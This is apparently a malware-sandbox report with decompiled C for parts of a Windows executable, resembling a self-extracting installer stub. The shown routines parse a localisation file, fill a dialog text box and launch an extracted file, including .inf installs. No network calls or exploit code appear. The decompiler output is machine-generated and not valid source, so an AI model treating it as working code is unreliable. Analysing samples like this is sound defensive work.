						_t332 = E01009BF0(_t394 - 0x2304, _t374, _t386, 0x200000);
						 *(_t394 - 0x20) = _t332;
						__eflags =  *(_t394 - 0x15);
						if( *(_t394 - 0x15) == 0) {
							_push(2 + _t332 * 2);
							_t216 = E010235D3(_t332);
							 *(_t394 - 0x30) = _t216;
							__eflags = _t216;
							if(_t216 == 0) {
								goto L57;
							}
							_t334 =  *(_t394 - 0x20);
							 *(_t334 + _t386) = _t320;
							__eflags = _t334 + 1;
							E0101137A(_t386, _t216, _t334 + 1);
							L010235CE(_t386);
							_t386 =  *(_t394 - 0x30);
							_t337 =  *(_t394 - 0x20);
							 *(_t394 - 0x1c) = _t386;
							L33:
							_t219 = 0x100000;
							__eflags = _t337 - 0x100000;
							if(_t337 <= 0x100000) {
								_t219 = _t337;
							}
							 *((short*)(_t386 + _t219 * 2)) = 0;
							E0100FDFB(_t394 - 0x14c, 0x10338f4, 0x64);
							_push(0x20002);
							_t222 = E010235D3(0);
							 *(_t394 - 0x10) = _t222;
							__eflags = _t222;
							if(_t222 != 0) {
								__eflags =  *(_t394 - 0x20);
								_t340 = _t320;
								_t375 = _t320;
								 *(_t394 - 0x14) = _t340;
								 *(_t394 - 0x84) = _t320;
								_t387 = _t320;
								 *(_t394 - 0x28) = _t320;
								if( *(_t394 - 0x20) <= 0) {
									L54:
									E0100CE72(_t391, _t375, _t394 - 0x84, _t222, _t340);
									L010235CE( *(_t394 - 0x1c));
									L010235CE( *(_t394 - 0x10));
									__eflags =  *((intOrPtr*)(_t391 + 0x2c)) - _t320;
									if( *((intOrPtr*)(_t391 + 0x2c)) <= _t320) {
										L56:
										 *0x1040f94 =  *((intOrPtr*)(_t391 + 0x28));
										E01025A90(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x3c)),  *((intOrPtr*)(_t391 + 0x40)), 4, E0100D070);
										E01025A90(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x50)),  *((intOrPtr*)(_t391 + 0x54)), 4, E0100D0A0);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E01013781(_t391 + 0x3c, _t375, _t320);
										E01013781(_t391 + 0x50, _t375, _t320);
										_t320 = _t320 + 1;
										__eflags = _t320 -  *((intOrPtr*)(_t391 + 0x2c));
									} while (_t320 <  *((intOrPtr*)(_t391 + 0x2c)));
									goto L56;
								}
								 *((intOrPtr*)(_t394 - 0x34)) = 0xd;
								 *((intOrPtr*)(_t394 - 0x38)) = 0xa;
								 *(_t394 - 0x30) = 9;
								do {
									_t232 =  *(_t394 - 0x1c);
									__eflags = _t387;
									if(_t387 == 0) {
										L80:
										_t376 =  *(_t232 + _t387 * 2) & 0x0000ffff;
										_t387 = _t387 + 1;
										__eflags = _t376;
										if(_t376 == 0) {
											break;
										}
										__eflags = _t376 -  *((intOrPtr*)(_t394 - 0x40));
										if(_t376 !=  *((intOrPtr*)(_t394 - 0x40))) {
											_t233 = 0xd;
											__eflags = _t376 - _t233;
											if(_t376 == _t233) {
												L99:
												E0100CE72(_t391,  *(_t394 - 0x28), _t394 - 0x84,  *(_t394 - 0x10), _t340);
												 *(_t394 - 0x84) = _t320;
												_t340 = _t320;
												 *(_t394 - 0x28) = _t320;
												L98:
												 *(_t394 - 0x14) = _t340;
												goto L52;
											}
											_t236 = 0xa;
											__eflags = _t376 - _t236;
											if(_t376 == _t236) {
												goto L99;
											}
											L96:
											__eflags = _t340 - 0x10000;
											if(_t340 >= 0x10000) {
												goto L52;
											}
											 *( *(_t394 - 0x10) + _t340 * 2) = _t376;
											_t340 = _t340 + 1;
											__eflags = _t340;
											goto L98;
										}
										__eflags = _t340 - 0x10000;
										if(_t340 >= 0x10000) {
											goto L52;
										}
										_t239 = ( *(_t232 + _t387 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0x22);
											L93:
											_pop(_t381);
											 *( *(_t394 - 0x10) + _t340 * 2) = _t381;
											_t340 = _t340 + 1;
											 *(_t394 - 0x14) = _t340;
											_t387 = _t387 + 1;
											goto L52;
										}
										_t241 = _t239 - 0x3a;
										__eflags = _t241;
										if(_t241 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t242 = _t241 - 0x12;
										__eflags = _t242;
										if(_t242 == 0) {
											_push(0xa);
											goto L93;
										}
										_t243 = _t242 - 4;
										__eflags = _t243;
										if(_t243 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t243 != 0;
										if(_t243 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t377 =  *(_t232 + _t387 * 2 - 2) & 0x0000ffff;
									__eflags = _t377 -  *((intOrPtr*)(_t394 - 0x34));
									if(_t377 ==  *((intOrPtr*)(_t394 - 0x34))) {
										L42:
										_t347 = 0x3a;
										__eflags =  *(_t232 + _t387 * 2) - _t347;
										if( *(_t232 + _t387 * 2) != _t347) {
											L71:
											 *(_t394 - 0x24) = _t232 + _t387 * 2;
											_t248 = E0100FCBF( *(_t232 + _t387 * 2) & 0x0000ffff);
											__eflags = _t248;
											if(_t248 == 0) {
												L79:
												_t340 =  *(_t394 - 0x14);
												_t232 =  *(_t394 - 0x1c);
												goto L80;
											}
											E0100FE56(_t394 - 0x2dc,  *(_t394 - 0x24), 0x64);
											_t252 = E01025885(_t394 - 0x2dc, L" \t,");
											 *(_t394 - 0x24) = _t252;
											__eflags = _t252;
											if(_t252 == 0) {
												goto L79;
											}
											 *_t252 = 0;
											E01011596(_t394 - 0x2dc, _t394 - 0x1b0, 0x64);
											E0100FDFB(_t394 - 0xe8, _t394 - 0x14c, 0x64);
											E0100FDD4(__eflags, _t394 - 0xe8, _t394 - 0x1b0, 0x64);
											E0100FDFB(_t394 - 0x84, _t394 - 0xe8, 0x32);
											_t266 = E010258D9(_t320, 0, _t387, _t391, _t394 - 0xe8,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E0100D050);
											_t398 = _t398 + 0x14;
											__eflags = _t266;
											if(_t266 != 0) {
												_t272 =  *_t266 * 0xc;
												__eflags = _t272;
												_t169 = _t272 + 0x103e150; // 0x28b64ee0
												 *(_t394 - 0x28) =  *_t169;
											}
											_t387 = _t387 + ( *(_t394 - 0x24) - _t394 - 0x2dc >> 1) + 1;
											__eflags = _t387;
											_t271 =  *(_t394 - 0x1c);
											_t378 = 0x20;
											while(1) {
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												L77:
												__eflags = _t352 -  *(_t394 - 0x30);
												if(_t352 !=  *(_t394 - 0x30)) {
													L51:
													_t340 =  *(_t394 - 0x14);
													goto L52;
												}
												L78:
												_t387 = _t387 + 1;
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												goto L77;
											}
										}
										_t393 =  *(_t394 - 0x1c);
										_t274 = _t232 | 0xffffffff;
										__eflags = _t274;
										 *(_t394 - 0x2c) = _t274;
										 *(_t394 - 0x50) = L"STRINGS";
										 *(_t394 - 0x4c) = L"DIALOG";
										 *(_t394 - 0x48) = L"MENU";
										 *(_t394 - 0x44) = L"DIRECTION";
										 *(_t394 - 0x24) = _t320;
										do {
											 *(_t394 - 0x24) = E010235B3( *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)));
											_t276 = E01025808(_t393 + 2 + _t387 * 2,  *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)), _t275);
											_t398 = _t398 + 0x10;
											_t379 = 0x20;
											__eflags = _t276;
											if(_t276 != 0) {
												L47:
												_t277 =  *(_t394 - 0x2c);
												goto L48;
											}
											_t361 =  *(_t394 - 0x24) + _t387;
											__eflags =  *((intOrPtr*)(_t393 + 2 + _t361 * 2)) - _t379;
											if( *((intOrPtr*)(_t393 + 2 + _t361 * 2)) > _t379) {
												goto L47;
											}
											_t277 = _t320;
											_t107 = _t361 + 1; // 0x200001
											_t387 = _t107;
											 *(_t394 - 0x2c) = _t277;
											L48:
											_t320 = _t320 + 1;
											__eflags = _t320 - 4;
										} while (_t320 < 4);
										_t391 =  *((intOrPtr*)(_t394 - 0x3c));
										_t320 = 0;
										__eflags = _t277;
										if(__eflags != 0) {
											_t232 =  *(_t394 - 0x1c);
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												L60:
												__eflags = _t355 -  *(_t394 - 0x30);
												if(_t355 !=  *(_t394 - 0x30)) {
													_t380 = _t232 + _t387 * 2;
													 *(_t394 - 0x24) = _t320;
													_t278 = 0x20;
													_t356 = _t320;
													__eflags =  *_t380 - _t278;
													if( *_t380 <= _t278) {
														L66:
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = 0;
														E01011596(_t394 - 0x214, _t394 - 0xe8, 0x64);
														_t387 = _t387 +  *(_t394 - 0x24);
														_t283 =  *(_t394 - 0x2c);
														__eflags = _t283 - 3;
														if(_t283 != 3) {
															__eflags = _t283 - 1;
															_t284 = "$%s:";
															if(_t283 != 1) {
																_t284 = "@%s:";
															}
															E0100DD6B(_t394 - 0x14c, 0x64, _t284, _t394 - 0xe8);
															_t398 = _t398 + 0x10;
														} else {
															_t288 = E010235E9(_t394 - 0x214, _t394 - 0x214, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t391 + 0x64)) =  ~_t288 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t356 - 0x63;
														if(_t356 >= 0x63) {
															break;
														}
														_t291 =  *_t380;
														_t380 = _t380 + 2;
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = _t291;
														_t356 = _t356 + 1;
														_t292 = 0x20;
														__eflags =  *_t380 - _t292;
														if( *_t380 > _t292) {
															continue;
														}
														break;
													}
													 *(_t394 - 0x24) = _t356;
													goto L66;
												}
												L61:
												_t387 = _t387 + 1;
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												goto L60;
											}
										}
										E0100FDFB(_t394 - 0x14c, 0x10338f4, 0x64);
										goto L51;
									}
									_t83 = _t394 - 0x38; // 0xa
									__eflags = _t377 -  *_t83;
									if(_t377 !=  *_t83) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t387 -  *(_t394 - 0x20);
								} while (_t387 <  *(_t394 - 0x20));
								_t222 =  *(_t394 - 0x10);
								_t375 =  *(_t394 - 0x28);
								goto L54;
							} else {
								L010235CE(_t386);
								goto L57;
							}
						}
						_t337 = _t332 >> 1;
						 *(_t394 - 0x20) = _t337;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E01013781(_t391, _t374, _t384);
						E01013781(_t391 + 0x14, _t374, _t384);
						_t384 = _t384 + 1;
						_t403 = _t384 -  *0x103e5f4; // 0x63
					} while (_t403 < 0);
					_t320 = 0;
					goto L7;
				}
			}

0x0100d341
0x0100d341
0x0100d346
0x0100d350
0x0100d35a
0x0100d35b
0x0100d35c
0x0100d35f
0x0100d361
0x0100d364
0x0100d367
0x0100d36d
0x0100d36f
0x0100d372
0x0100d378
0x0100d3b4
0x0100d37a
0x0100d382
0x0100d39a
0x0100d3a4
0x0100d3a4
0x0100d3bf
0x0100d3c4
0x0100d3cc
0x0100d3cf
0x0100d3dd
0x0100d7a0
0x0100d7a6
0x0100d7b1
0x0100d7bb
0x0100d3e3
0x0100d3e3
0x0100d3e5
0x0100d3eb
0x0100d409
0x0100d415
0x0100d427
0x0100d42c
0x0100d42f
0x0100d432
0x0100d435
0x0100d438
0x0100d43b
0x0100d44f
0x0100d464
0x0100d469
0x0100d46c
0x0100d46e
0x0100d46e
0x0100d471
0x0100d476
0x0100d535
0x0100d535
0x0100d538
0x0100d53b
0x0100d54c
0x0100d554
0x0100d555
0x0100d558
0x0100d55d
0x00000000
0x00000000
0x0100d563
0x0100d566
0x00000000
0x00000000
0x00000000
0x0100d566
0x00000000
0x0100d47c
0x0100d484
0x0100d4af
0x0100d4b1
0x0100d4ba
0x0100d4e5
0x0100d4ed
0x0100d519
0x0100d519
0x0100d51d
0x00000000
0x00000000
0x0100d51f
0x00000000
0x0100d4f9
0x0100d509
0x0100d50e
0x0100d513
0x00000000
0x00000000
0x00000000
0x0100d513
0x0100d4ed
0x0100d4c2
0x0100d4c8
0x0100d4d9
0x0100d4de
0x0100d4e3
0x0100d527
0x00000000
0x0100d527
0x0100d4e3
0x00000000
0x0100d490
0x0100d4a0
0x0100d4a5
0x0100d4aa
0x0100d52b
0x0100d52b
0x0100d52e
0x0100d530
0x00000000
0x0100d530
0x0100d4ac
0x00000000
0x0100d4ac
0x0100d484
0x0100d47c
0x0100d575
0x0100d578
0x0100d57d
0x0100d587
0x0100d589
0x0100d58d
0x0100d58f
0x00000000
0x00000000
0x0100d5a6
0x0100d5ab
0x0100d5ae
0x0100d5b0
0x0100d5c0
0x0100d5c1
0x0100d5c6
0x0100d5ca
0x0100d5cc
0x00000000
0x00000000
0x0100d5d2
0x0100d5d5
0x0100d5d8
0x0100d5dc
0x0100d5e2
0x0100d5e7
0x0100d5eb
0x0100d5ee
0x0100d5f1
0x0100d5f1
0x0100d5f6
0x0100d5f8
0x0100d5fa
0x0100d5fa
0x0100d600
0x0100d610
0x0100d615
0x0100d61a
0x0100d61f
0x0100d623
0x0100d625
0x0100d633
0x0100d637
0x0100d639
0x0100d63b
0x0100d63e
0x0100d644
0x0100d646
0x0100d649
0x0100d731
0x0100d73d
0x0100d745
0x0100d74d
0x0100d754
0x0100d757
0x0100d771
0x0100d77e
0x0100d786
0x0100d798
0x00000000
0x00000000
0x00000000
0x00000000
0x0100d759
0x0100d759
0x0100d75d
0x0100d766
0x0100d76b
0x0100d76c
0x0100d76c
0x00000000
0x0100d759
0x0100d64f
0x0100d656
0x0100d65d
0x0100d664
0x0100d664
0x0100d667
0x0100d669
0x0100d97c
0x0100d97c
0x0100d980
0x0100d981
0x0100d984
0x00000000
0x00000000
0x0100d98a
0x0100d98e
0x0100d9e0
0x0100d9e1
0x0100d9e4
0x0100da0a
0x0100da1a
0x0100da1f
0x0100da25
0x0100da27
0x0100da02
0x0100da02
0x00000000
0x0100da02
0x0100d9e8
0x0100d9e9
0x0100d9ec
0x00000000
0x00000000
0x0100d9ee
0x0100d9ee
0x0100d9f4
0x00000000
0x00000000
0x0100d9fd
0x0100da01
0x0100da01
0x00000000
0x0100da01
0x0100d990
0x0100d996
0x00000000
0x00000000
0x0100d9a0
0x0100d9a0
0x0100d9a3
0x0100d9ca
0x0100d9cc
0x0100d9cf
0x0100d9d0
0x0100d9d4
0x0100d9d5
0x0100d9d8
0x00000000
0x0100d9d8
0x0100d9a5
0x0100d9a5
0x0100d9a8
0x0100d9c6
0x00000000
0x0100d9c6
0x0100d9aa
0x0100d9aa
0x0100d9ad
0x0100d9c2
0x00000000
0x0100d9c2
0x0100d9af
0x0100d9af
0x0100d9b2
0x0100d9be
0x00000000
0x0100d9be
0x0100d9b5
0x0100d9b8
0x00000000
0x00000000
0x0100d9ba
0x00000000
0x0100d9ba
0x0100d66f
0x0100d674
0x0100d678
0x0100d684
0x0100d686
0x0100d687
0x0100d68b
0x0100d880
0x0100d883
0x0100d88a
0x0100d88f
0x0100d891
0x0100d976
0x0100d976
0x0100d979
0x00000000
0x0100d979
0x0100d8a3
0x0100d8b4
0x0100d8b9
0x0100d8be
0x0100d8c0
0x00000000
0x00000000
0x0100d8c8
0x0100d8db
0x0100d8f0
0x0100d905
0x0100d91a
0x0100d932
0x0100d937
0x0100d93a
0x0100d93c
0x0100d93e
0x0100d93e
0x0100d941
0x0100d947
0x0100d947
0x0100d95a
0x0100d95a
0x0100d95c
0x0100d95f
0x0100d960
0x0100d960
0x0100d964
0x0100d967
0x00000000
0x00000000
0x0100d969
0x0100d969
0x0100d96d
0x0100d71f
0x0100d71f
0x00000000
0x0100d71f
0x0100d973
0x0100d973
0x0100d960
0x0100d964
0x0100d967
0x00000000
0x00000000
0x00000000
0x0100d967
0x0100d960
0x0100d691
0x0100d694
0x0100d694
0x0100d697
0x0100d69a
0x0100d6a1
0x0100d6a8
0x0100d6af
0x0100d6b6
0x0100d6b9
0x0100d6ca
0x0100d6d1
0x0100d6d6
0x0100d6db
0x0100d6dc
0x0100d6de
0x0100d6f6
0x0100d6f6
0x00000000
0x0100d6f6
0x0100d6e3
0x0100d6e5
0x0100d6ea
0x00000000
0x00000000
0x0100d6ec
0x0100d6ee
0x0100d6ee
0x0100d6f1
0x0100d6f9
0x0100d6f9
0x0100d6fa
0x0100d6fa
0x0100d6ff
0x0100d702
0x0100d704
0x0100d706
0x0100d7be
0x0100d7c1
0x00000000
0x00000000
0x00000000
0x00000000
0x0100d7c7
0x0100d7c7
0x0100d7c7
0x0100d7cb
0x0100d7ce
0x00000000
0x00000000
0x0100d7d0
0x0100d7d0
0x0100d7d4
0x0100d7d9
0x0100d7dc
0x0100d7e1
0x0100d7e2
0x0100d7e4
0x0100d7e7
0x0100d808
0x0100d80a
0x0100d822
0x0100d827
0x0100d82a
0x0100d82d
0x0100d830
0x0100d853
0x0100d856
0x0100d85b
0x0100d85d
0x0100d85d
0x0100d873
0x0100d878
0x0100d832
0x0100d83e
0x0100d846
0x0100d84b
0x0100d84b
0x00000000
0x00000000
0x00000000
0x00000000
0x0100d7e9
0x0100d7e9
0x0100d7e9
0x0100d7ec
0x00000000
0x00000000
0x0100d7ee
0x0100d7f1
0x0100d7f4
0x0100d7fc
0x0100d7ff
0x0100d800
0x0100d803
0x00000000
0x00000000
0x00000000
0x0100d803
0x0100d805
0x00000000
0x0100d805
0x0100d7d6
0x0100d7d6
0x0100d7c7
0x0100d7c7
0x0100d7cb
0x0100d7ce
0x00000000
0x00000000
0x00000000
0x0100d7ce
0x0100d7c7
0x0100d71a
0x00000000
0x0100d71a
0x0100d67a
0x0100d67a
0x0100d67e
0x00000000
0x00000000
0x00000000
0x0100d722
0x0100d722
0x0100d722
0x0100d72b
0x0100d72e
0x00000000
0x0100d627
0x0100d628
0x00000000
0x0100d62d
0x0100d625
0x0100d5b2
0x0100d5b4
0x00000000
0x00000000
0x00000000
0x00000000
0x0100d3ed
0x0100d3ed
0x0100d3f0
0x0100d3f9
0x0100d3fe
0x0100d3ff
0x0100d3ff
0x0100d407
0x00000000
0x0100d407

APIs

__EH_prolog.LIBCMT ref: 0100D346
_wcschr.LIBVCRUNTIME ref: 0100D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0100D328,?), ref: 0100D382
__fprintf_l.LIBCMT ref: 0100D873

Part of subcall function 0101137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100B652,00000000,?,?,?,000C0084), ref: 01011396

Strings

, xrefs: 0100D67A
*messages***, xrefs: 0100D4D3
*messages***, xrefs: 0100D49A
a, xrefs: 0100D4EF
@%s:, xrefs: 0100D85D, 0100D869
R, xrefs: 0100D4E5
,, xrefs: 0100D8AE
RTL, xrefs: 0100D838
$%s:, xrefs: 0100D856

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: 447aa13bc1f767afcd319b6026bfbff7daab801dadf2ec2b0fdd2765e0ff1bb6
Instruction ID: 6421e9d8e2114d31a458351e1795f9c5c4e0cc6bd607d3646eebf9f1b7b04fde
Opcode Fuzzy Hash: 447aa13bc1f767afcd319b6026bfbff7daab801dadf2ec2b0fdd2765e0ff1bb6
Instruction Fuzzy Hash: 9B12E97190021A9BEF26DFE8DC81BED77B5FF54300F0041AAE689A71C1EB709A44CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0101CB5A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0101CB5A() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E0101AC74(); // executed
				_t46 = GetDlgItem( *0x1048458, 0x68);
				_t49 =  *0x1048463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0x1048440; // 0x0
					E010189EE(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0x10335b4);
					 *0x1048463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}

0x0101cb61
0x0101cb7b
0x0101cb80
0x0101cb86
0x0101cb88
0x0101cb8e
0x0101cb96
0x0101cba1
0x0101cbaf
0x0101cbb5
0x0101cbb5
0x0101cbc5
0x0101cbcf
0x0101cbdf
0x0101cbe7
0x0101cbeb
0x0101cbf0
0x0101cbf6
0x0101cc01
0x0101cc0b
0x0101cc13
0x0101cc13
0x0101cc23
0x0101cc31
0x0101cc40
0x0101cc48
0x0101cc56
0x0101cc67
0x0101cc67
0x0101cc83

APIs

Part of subcall function 0101AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101AC85
Part of subcall function 0101AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101AC96
Part of subcall function 0101AC74: IsDialogMessageW.USER32(000C0084,?), ref: 0101ACAA
Part of subcall function 0101AC74: TranslateMessage.USER32(?), ref: 0101ACB8
Part of subcall function 0101AC74: DispatchMessageW.USER32(?), ref: 0101ACC2

GetDlgItem.USER32(00000068,0105ECB0), ref: 0101CB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0101A632,00000001,?,?,0101AECB,01034F88,0105ECB0), ref: 0101CB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101CBA1
SendMessageW.USER32(00000000,000000C2,00000000,010335B4), ref: 0101CBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101CBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101CBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101CC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101CC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101CC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101CC67
SendMessageW.USER32(00000000,000000C2,00000000,0103431C), ref: 0101CC76

Strings

\, xrefs: 0101CBCF

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: bb73bbff000b69dab8c2d2850f82867815f1fe8d2c6c30c798bb81bcc87d83f8
Instruction ID: 47a8aa9fc03ba5acb5f4cf68fb419435fb1a13c86bc079ec898186051afab248
Opcode Fuzzy Hash: bb73bbff000b69dab8c2d2850f82867815f1fe8d2c6c30c798bb81bcc87d83f8
Instruction Fuzzy Hash: CC31F371185341AFE321DF20DD49FAB7FADEB82704F000509FAD0961D6D76A4904C776

Uniqueness

Uniqueness Score: -1.00%

Function 0101CE22, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0101CE22(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t55;
				signed int _t58;
				signed short* _t59;
				long _t70;
				int _t79;
				intOrPtr _t82;
				signed int _t83;
				signed short* _t84;
				signed short _t85;
				long _t88;
				signed short* _t89;
				void* _t90;
				signed short* _t93;
				struct HWND__* _t95;
				void* _t96;
				void* _t97;
				void* _t100;

				_t96 = __ebp;
				_t55 = 0x1040;
				E0101E360();
				_t93 = _a4168;
				_t79 = 0;
				if( *_t93 == 0) {
					L55:
					return _t55;
				}
				_t55 = E010235B3(_t93);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t88 = 0x3c;
					E0101F350(_t88,  &_a4, 0, _t88);
					_t82 = _a4176;
					_t100 = _t100 + 0xc;
					_a4.cbSize = _t88;
					_a8 = 0x1c0;
					if(_t82 != 0) {
						_a8 = 0x5c0;
					}
					_t83 =  *_t93 & 0x0000ffff;
					_t89 =  &(_t93[1]);
					_push(_t96);
					_t97 = 0x22;
					if(_t83 != _t97) {
						_t89 = _t93;
					}
					_a20 = _t89;
					_t58 = _t79;
					if(_t83 == 0) {
						L13:
						_t59 = _a24;
						L14:
						if(_t59 == 0 ||  *_t59 == _t79) {
							if(_t82 == 0 &&  *0x104b472 != _t79) {
								_a24 = 0x104b472;
							}
						}
						_a32 = _a4172;
						_t90 = E0100B493(_t89);
						if(_t90 != 0 && E010117AC(_t90, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E0100A180(_a20) != 0) {
							E0100B239(_a20,  &_a64, 0x800);
							_a8 =  &_a52;
						}
						_t55 = ShellExecuteExW( &_a4); // executed
						if(_t55 != 0) {
							_t95 = _a4160;
							if( *0x1049468 != _t79 || _a4172 != _t79 ||  *0x105ec99 != _t79) {
								if(_t95 != 0) {
									_push(_t95);
									if( *0x10620ac() != 0) {
										ShowWindow(_t95, _t79);
										_t79 = 1;
									}
								}
								 *0x10620a8(_a56, 0x7d0);
								E0101D2E6(_a48);
								if( *0x105ec99 != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t70 = _v12;
									if(_t70 >  *0x105ec9c) {
										 *0x105ec9c = _t70;
									}
									 *0x105ec9a = 1;
								}
							}
							CloseHandle(_a48);
							if(_t90 == 0 || E010117AC(_t90, L".exe") != 0) {
								_t55 = _a4164;
								if( *0x1049468 != 0 && _t55 == 0 &&  *0x105ec99 == _t55) {
									 *0x105eca0 = 0x1b58;
								}
							} else {
								_t55 = _a4164;
							}
							if(_t79 != 0 && _t55 != 0) {
								_t55 = ShowWindow(_t95, 1);
							}
						}
						goto L55;
					}
					_t84 = _t93;
					_v0 = 0x20;
					do {
						if( *_t84 == _t97) {
							while(1) {
								_t58 = _t58 + 1;
								if(_t93[_t58] == _t79) {
									break;
								}
								if(_t93[_t58] == _t97) {
									_t85 = _v0;
									_t93[_t58] = _t85;
									L10:
									if(_t93[_t58] == _t85 ||  *((short*)(_t93 + 2 + _t58 * 2)) == 0x2f) {
										if(_t93[_t58] == _v0) {
											_t93[_t58] = 0;
										}
										_t59 =  &(_t93[_t58 + 1]);
										_a24 = _t59;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t85 = _v0;
						goto L10;
						L12:
						_t58 = _t58 + 1;
